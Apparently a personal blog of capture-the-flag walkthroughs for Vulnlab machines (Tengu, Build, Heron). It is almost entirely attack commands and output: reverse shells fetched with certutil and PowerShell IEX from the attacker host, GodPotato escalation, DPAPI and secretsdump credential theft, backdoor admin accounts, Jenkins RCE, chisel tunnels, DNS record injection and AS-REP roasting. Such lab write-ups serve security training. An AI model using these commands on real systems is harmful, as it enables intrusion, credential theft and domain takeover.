export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters  dbo@master)> 

.

SQL (TENGU\t1_m.winters  dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ rlwrap nc -nlvp 443                                 
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp> 

.

godpotato on sql

PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888

catch the shell as nt-authority system and add ourself as local admin on sql

after 1st findind credsof domain admin TENGU\T0_c.fowler

Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.

PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*]    m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544


[*] SYSTEM master key cache:

{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86


[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : Unt<redacted>y25

 

.

 

PS C:\temp> net user puck Password123! /add
The command completed successfully.

PS C:\temp> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
puck                     WDAGUtilityAccount       
The command completed with one or more errors.

PS C:\temp> net localgroup administrators puck /add
The command completed successfully.

next rdp to sql as puck

proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389

 

from there start AD users and computers as user , and add a domain-admin puck , then mstsc to dc.tengu.vl

 

finaly do a hashdump

proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt

Because all Domain Admins are member of the group PROTECTED USERS@TENGU.VL , we can’t rdp in

 

 

That was super fun

vulnlab-build

vulnlab-build

an easy Linux box

.

rsync enum

└─$ rsync -av --list-only rsync://10.10.94.243
backups         backups
└─$ rsync -r rsync://10.10.94.243::backups

Dycrypting Jenkins pasword

┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets]
└─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml
Git<redacted>!

Login to Gitea as user buildadm, and get RCE by editing the jenkinsfile

Start a netcat listener to catch the shell

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001              
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}

run chisel server

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ chisel server -p 8000 --reverse     
2024/08/09 10:26:20 server: Reverse tunnelling enabled
2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE=
2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000
2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

from docker

# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8506k  100 8506k    0     0  8620k      0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root    4096 Aug  9 08:25 .
drwxr-xr-x 1 root root    4096 May  9 18:50 ..
lrwxrwxrwx 1 root root       9 May  1 14:37 .bash_history -> /dev/null
-r-------- 1 root root      35 May  1 17:37 .rhosts
drwxr-xr-x 2 root root    4096 May  1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug  9 08:25 chisel
-rw------- 1 root root      37 May  1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)

.

nmap the host

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds
                                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/build]

Do the mysql thing

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.18.0.1:3306  ...  OK
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.025 sec)

MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                                                     | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)

MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)

MariaDB [powerdnsadmin]> 
MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
    -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1);
Query OK, 1 row affected (0.023 sec)

MariaDB [powerdnsadmin]> 

.

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ john admin.hash                                            
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst
wi<redacted>on          (?)     
1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Install rsh client on kali box

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ sudo apt-get install rsh-redone-client

rsh to build.vl machine as root

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Aug  9 08:42:41 AM UTC 2024

  System load:                      0.64306640625
  Usage of /:                       62.7% of 9.75GB
  Memory usage:                     60%
  Swap usage:                       0%
  Processes:                        144
  Users logged in:                  0
  IPv4 address for br-f8002c9d7234: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens5:            10.10.94.243


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~# 
                                                                                       

That was fun.

 

 

 

vulnlab-heron

vulnlab-heron

a medium chain

We find a note online with the initial pass to connect to the linux box : pentest:Heron123!

We start chisel on our kali box

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ chisel server -p 8000 --reverse 
2024/08/02 14:29:11 server: Reverse tunnelling enabled
2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM=
2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000
2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

 

.

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ ssh pentest@10.10.148.86                                      
The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts.
****************************************************
*              Welcome to Heron Corp               *
*  Unauthorized access to 'frajmp.heron.vl' is     *
*  forbidden and will be prosecuted by law.        *
****************************************************
(pentest@10.10.148.86) Password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)

 System information as of Fri Aug  2 12:24:16 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   44.8% of 9.75GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.148.86
  Swap usage:   0%


Last login: Fri Jun  7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ who
pentest  pts/0        2024-08-02 12:24 (10.8.2.138)
pentest@frajmp:~$ cd /tmp
pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel
--2024-08-02 12:28:23--  http://10.8.2.138/chisel
Connecting to 10.8.2.138:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel                100%[=======================>]   8.31M  6.88MB/s    in 1.2s    

2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104]

pentest@frajmp:/tmp$ chmod +x chisel 
pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000
2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)

We do a slow nmap scan over proxychains to the DC

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:53  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

Nmap scan report for 10.10.148.85
Host is up (0.062s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
53/tcp   open   domain        Simple DNS Plus
80/tcp   open   http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open   msrpc         Microsoft Windows RPC
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after:  2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp  closed https
445/tcp  open   microsoft-ds  Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open   ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HERON
|   NetBIOS_Domain_Name: HERON
|   NetBIOS_Computer_Name: MUCDC
|   DNS_Domain_Name: heron.vl
|   DNS_Computer_Name: mucdc.heron.vl
|   DNS_Tree_Name: heron.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after:  2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-02T12:49:12
|_  start_date: N/A
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery: 
|   OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
|   Computer name: mucdc
|   NetBIOS computer name: MUCDC\x00
|   Domain name: heron.vl
|   Forest name: heron.vl
|   FQDN: mucdc.heron.vl
|_  System time: 2024-08-02T05:49:10-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

.

on open port 80 we do a curl and find some usernames

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85          
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
<!DOCTYPE html>
<html lang="en">
<body>
    <div class="container mt-5">
        <div class="text-center mb-4">
            <h1 class="display-4 text-white">Heron Corp</h1>
            <p class="lead text-white">Building the future of aerospace with precision and innovation.</p>


                        <h5 class="card-title">Wayne Wood</h5>
                        <p class="card-text">CEO</p>
                        <p>Email: wayne.wood@heron.vl</p>

                        <h5 class="card-title">Julian Pratt</h5>
                        <p class="card-text">Head of IT</p>
                        <p>Email: julian.pratt@heron.vl</p>

                        <i class="fas fa-user-tie fa-3x mb-3"></i>
                        <h5 class="card-title">Samuel Davies</h5>
                        <p class="card-text">Accounting</p>
                        <p>Email: samuel.davies@heron.vl</p>

</body>
</html>                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

We add to our /etc/hosts

10.10.148.85 mucdc.heron.vl heron.vl

Check for vuln ASREProasting users ( meaning AD account with option set : Do not require Kerberos preauthetication )

 

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

We crack this with hashcat , AS-REP Roasting uses hashcat mode 18200

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting


Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
Time.Started.....: Fri Aug  2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug  2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)

Started: Fri Aug  2 15:06:29 2024
Stopped: Fri Aug  2 15:06:32 2024

With the pass found, we do a bloodhound enum

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
INFO: Found AD domain: heron.vl
INFO: Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 5 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frajmp.heron.vl
INFO: Querying computer: 
INFO: Querying computer: 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.86:445 INFO: Querying computer: 
INFO: Querying computer: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445 <--socket error or timeout!
 ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
INFO: Done in 00M 07S
INFO: Compressing output into 20240802151131_bloodhound.zip

Getting more users with ldapdump

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

SMB enum

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Password for [WORKGROUP\samuel.davies]:

    Sharename       Type      Comment
    ---------       ----      -------
    accounting$     Disk      
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    CertEnroll      Disk      Active Directory Certificate Services share
    home$           Disk      
    IPC$            IPC       Remote IPC
    it$             Disk      
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    transfer$       Disk      
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Connect to smb we find group.xml with a pasword in it

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 26 11:37:40 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  heron.vl                           Dr        0  Sun May 26 11:37:40 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
